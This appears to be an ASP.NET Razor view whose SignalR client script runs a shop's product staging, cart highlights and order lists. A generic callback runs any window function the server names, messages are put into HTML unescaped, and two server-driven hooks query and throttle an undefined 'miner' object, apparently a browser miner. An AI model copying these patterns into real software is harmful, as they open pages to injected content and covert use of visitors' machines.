@model  SignalRService.ViewModels.ServiceSettingViewModel

  
    <script>
        var servicehub;
        $(function () {
            servicehub = $.connection.serviceHub;
            servicehub.client.hello = function () {
                // Add the message to the page.
                $('body').append('<strong>HELLO</strong>');
            };

            //general purpose callback method
            servicehub.client.clientCallback = function (data) {
                var fn = getFunctionFromString(data.Method);
                if (typeof fn === 'function') {
                    fn(data.Parameters);
                }
            }

            servicehub.client.someoneAddedItemToCart = function (itemid) {
                //find item and highlight it
                $('*[data-itemid=' + itemid + ']').addClass("highlight");
                setTimeout(function () {
                    $('*[data-itemid=' + itemid + ']').removeClass("highlight");
                }, 500);
            }

            servicehub.client.restageAll = function (group) {

                var products = itemOrderHost.getProductsFromCookie();
                for (var i = 0; i < products.length; i++) {

                    servicehub.server.stageProduct(products[i], group)
                        .done(function (data) {
                            if (data.length == 0) {
                                //all ok - no messages
                            }
                            else {
                                showMessageDailog(data.toString(), '#edititemwrapper');
                            }
                        })
                        .fail(function () {
                            console.log("staeingRequest failed...");
                        });

                }
            }

            servicehub.client.productStaged = function (data) {
                //add to available products on host
                if (itemOrderHost) {

                    var existingitem = $('#hostitemlist').children().find("*[data-itemid='" + data.Id + "']");
                    if (existingitem.length == 0) {
                        $('#hostitemlist').append(hostProducList.createItem(data.Id, data.ImgUrl, data.Name, data.Description, data.Price));
                        $('#hostitemlist').listview();
                        $('#hostitemlist').listview("refresh");
                    }
                    //else {
                    //    $(existingitem).replaceWith(itemOrderHost.createProductItem(data.Id, data.ImgSrc, data.Name, data.Description, data.Price));
                    //}    
                }

                if (itemOrderClient) {

                    var existingitem = $('#customeritemlist').find("*[data-itemid='" + data.Id + "']");
                    if (existingitem.length == 0) {
                        $('#customeritemlist').append(productItemList.createItem(data.Id, data.ImgUrl, data.Name, data.Description, data.Price));
                        $('#customeritemlist').listview();
                        $('#customeritemlist').listview("refresh");
                    }
                    else {
                        $(existingitem).replaceWith(productItemList.createItem(data.Id, data.ImgSrc, data.Name, data.Description, data.Price));
                    }
                }
            }

            servicehub.client.productRemove = function (id) {
                itemOrderHost.productRemove(id);
            }


            servicehub.client.hostOrderRequest = function (order) {
                //got new clientorder from server...
                var element = hostOrderList.createItem(order);
                $('#hostorderitemlist').append(element);

            }

         
            servicehub.client.updateOrder = function (ordervm) {

                if (typeof itemOrderClient !== 'undefined') {
                    itemOrderClient.orderUpdate(ordervm);
                }

                if (typeof itemOrderHost !== 'undefined') {
                    itemOrderHost.orderUpdate(ordervm);
                }
            }

            //----

            servicehub.client.miner_reportStatus = function () {
                //send stats to server
                miner.reportStatus();
            }

            servicehub.client.miner_setThrottle = function(data) {
                miner.client().setThrottle(data);
            }

            // Start the connection.
            $.connection.hub.start().done(function () {



                @if (Model != null)
                {
                        <text>
                            servicehub.server.joinGroup("@Model.SiganlRBaseConfigurationVieModel.SinalRGroup");
                        </text>
                }

                @{
                    if (SignalRService.Utils.ServiceUtils.IsServiceOwner(Model.Id, User.Identity.Name))
                    {
                        <text>
                        itemOrderHost.run(".body-content");
                        </text>
                    }
                    else
                    {
                        <text>
                        itemOrderClient.run(".body-content");
                        </text>
                    }
                }


                    });

        });

        //to avoid use of eval
        // Get function from string, with or without scopes (by Nicolas Gauthier)
        window.getFunctionFromString = function (string) {
            var scope = window;
            var scopeSplit = string.split('.');
            for (i = 0; i < scopeSplit.length - 1; i++) {
                scope = scope[scopeSplit[i]];

                if (scope == undefined) return;
            }
            return scope[scopeSplit[scopeSplit.length - 1]];
        }

        function testmethod(params) {
            $('body').append('<strong>called: testmethod</strong>');
            $(params).each(function (idx) {
                $('body').append('<strong>' + params.param1 + " | " + params.param2 + '</strong>');
            });
            $('body').append('<strong>-----</strong>');
        }


        function showMessageDailog(message,appendTo) {

            $('#messageDialog').remove();
            var element = "<div id=\"messageDialog\" title=\"Nachricht\">" +
                "<p>" + message + "</p>" +
                "</div>";
            $(appendTo).append(element);
            $('#messageDialog').popup();
            $('#messageDialog').popup("open");
        }

        function toDataURL(src, callback, outputFormat) {
            var img = new Image();
            img.crossOrigin = 'Anonymous';
            img.onload = function () {
                var canvas = document.createElement('CANVAS');
                var ctx = canvas.getContext('2d');
                var dataURL;
                canvas.height = this.naturalHeight;
                canvas.width = this.naturalWidth;
                ctx.drawImage(this, 0, 0);
                dataURL = canvas.toDataURL(outputFormat);
                callback(dataURL);
            };
            img.src = src;
            if (img.complete || img.complete === undefined) {
                img.src = "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///ywAAAAAAQABAAACAUwAOw==";
                img.src = src;
            }
        }

        //toDataURL(
        //    'https://someimg.png',
        //    function (dataUrl) {
        //        console.log('RESULT:', dataUrl)
        //    }
        //)

        //Camera.PictureSourceType.CAMERA
        //Camera.PictureSourceType.PHOTOLIBRARY
        //Camera.PictureSourceType.SAVEDPHOTOALBU
        function getPhoto(source) {
            // Retrieve image file location from specified source
            navigator.camera.getPicture(onPhotoURISuccess, onFail, {
                quality: 50,
                destinationType: destinationType.FILE_URI,
                sourceType: source
            });
        }


    </script>

